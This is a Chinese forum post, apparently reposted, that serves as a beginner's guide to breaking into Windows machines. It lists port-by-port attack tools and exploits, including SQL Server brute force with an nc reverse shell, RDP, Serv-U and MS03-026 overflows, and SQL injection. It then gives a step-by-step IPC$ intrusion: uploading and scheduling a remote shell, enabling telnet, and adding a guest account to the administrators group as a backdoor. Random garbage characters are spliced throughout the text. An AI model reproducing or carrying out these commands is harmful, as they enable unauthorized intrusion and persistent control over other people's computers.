TA的每日心情 | 衰 2019-8-18 09:37 |
|---|
签到天数: 2 天 [LV.1]初来乍到
|
来源:hi.baidu
+ y7 q# q4 n1 X8 k2 |, q6 W' {- F希望对新手入侵有帮助! I+ y. G6 N: z3 @$ d3 f9 S
1. 1433端口入侵
; V u' Q* m) b scanport.exe 查有1433的机器
2 A. M4 C3 U2 H SQLScanPass.exe 进行字典暴破(字典是关键)9 k. R# \ S: c
最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。. q) w) z* R0 I, O, x/ _
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口3 V& o+ }% f* @ J
(以上反向的,测试成功)
" d4 ~9 h8 t' ~+ i sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
- O @" o& J7 j S 2. 4899端口入侵
. l2 K: q; S W) U 用4899过滤器.exe,扫描空口令的机器 B5 T: x! H+ \% ^. ~! D
3. 3899的入侵$ n2 A8 ?* b! |2 Q' F M9 ]
对很早的机器,可以试试3389的溢出(win3389ex.exe)3 j: q) D7 P+ H# Z4 K' L8 a& D( h
对2000的机器,可以试试字典暴破。(tscrack.exe)
5 o$ W' {1 q: u z$ b3 W 4. 80入侵5 g9 h. C) g$ P! e1 d9 C$ X0 k
对sp3以前的机器,可以用webdav入侵;
7 `4 C" z% X1 H. M8 ` 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
9 w: q1 j' j k, Z# j 可以利用SQL进行注入。(啊D的注入软件)。% U* ~* H. M, ]8 L+ P2 z
5. serv-u入侵(21端口)
! t+ N6 y2 @- O. h 对5. 004及以下系统,可用溢出入侵。(serv5004.exe)+ n" O% ]' x3 @/ t( l
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)4 z" N7 k2 B1 l. l! F- O
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
4 a% I; ?: ?, {) r) N5 y( B 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码
& M" [: E6 H* R( z 6. 554端口
1 q) f$ h7 H/ W2 k4 h1 E 用real554.exe入侵。 I* x5 T# y0 B
7. 6129端口
4 _% D! Z' a8 n+ `$ B: S( S 用DameWare6129.exe入侵。
+ {1 _7 P" G; Q' b 8. 系统漏洞5 U' o- w. f2 {7 K' Q; \
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。
2 g4 l0 W' o0 V4 T9. 3127等端口
' b q G! m5 N* \& T" \( O, V
- Z% S1 \7 p+ X: x0 t) \* M 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
' R% A0 S# G3 E9 F, i: D 10. 其他入侵! M4 X q3 C: m" i% }
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。6 u' F4 Z2 i n( F( C/ Q0 P
- h3 E1 j7 O; W7 R- b 经典IPC$入侵
I/ `, f% O5 N9 L9 _
# k% W& Y9 u | 1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"& w) G& j) L% o1 l; Q+ V7 f4 M
这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
/ v/ X/ d5 K5 j1 H 2. C:\>copy srv.exe $">\\127.0.0.1\admin$$ q! ~: ~ m% g8 ?% r9 H
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。, [2 s( L& E# {2 v& |$ k! N
3. C:\>net time file://127.0.0.1/: { r* ]% ?; T1 j
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
9 P7 ^8 u1 W u6 R( {; l! [ 4. C:\>at file://127.0.0.1/ 11:05 srv.exe; l% T, _1 {; r% O; E! L5 i7 O
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.
* Z: q/ k3 H0 J1 Q1 Q 5. C:\>net time file://127.0.0.1/' ^1 r) V7 W2 y) ]8 h
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。/ i7 R/ m7 e+ r
6. C:\>telnet 127.0.0.1 99- a7 ~. \( K( v
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
# d& W& h+ X. m' f+ D 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
9 e- y. K0 R' c2 D5 t0 F2 s. o- P 7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$
# P: v1 m% } [2 F7 D6 Y 用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
( ~( e3 l% g: k8 l) G) M: l8 p 8. C:\WINNT\system32>ntlm
Q+ w- _6 R" \ 输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
/ J+ A8 o: U. I5 | 9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组4 ?, J1 a$ W$ }( S5 O9 g0 i* U' w; g
10. C:\>net user guest /active:yes
4 L9 f2 p! _" T+ t" w. N 将对方的Guest用户激活" S6 S h+ s% f/ w* G
11. C:\>net user guest 1234
, n: l: b- {; N 将Guest的密码改为1234,或者你要设定的密码" R/ W6 u# r: f- _
12. C:\>net localgroup administrators guest /add( @; }0 [4 @6 k- m8 s
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) |
|